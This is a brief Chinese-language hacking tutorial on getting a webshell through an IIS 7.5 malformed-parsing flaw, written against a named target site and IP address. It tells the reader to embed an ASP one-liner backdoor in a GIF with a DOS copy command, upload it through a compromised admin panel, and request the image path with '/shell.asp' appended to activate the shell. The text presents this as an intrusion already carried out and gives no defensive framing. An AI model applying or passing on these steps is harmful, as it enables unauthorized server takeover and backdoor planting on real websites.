IIS7.5畸形解析拿shell利用方法
目标站:XXXX.com
目标IP:14.1.20.106
服务器系统:Microsoft-IIS/7.5
环境平台:ASP.NET
这个站是IIS7.5的 拿站过程就不写了 直接讲进入后台
准备一个txt 写进我们的asp一句话 还有随便的一张图片
然后DOS合并:copy x.gif /b + x.txt/a x.gif
生成x.gif 然后在后台上传合成的图片
得到了XXXX.com/Upload/Uploadfile/images/x.gif是我们图片的地址
然后在地址后面加个shell.asp,
XXXX.com/Upload/Uploadfile/images/x.gif/shell.asp
在浏览器中运行 它会提示错误 然后会在目录下生成
XXXX.com/shell.asp它就是我们的一句话木马地址
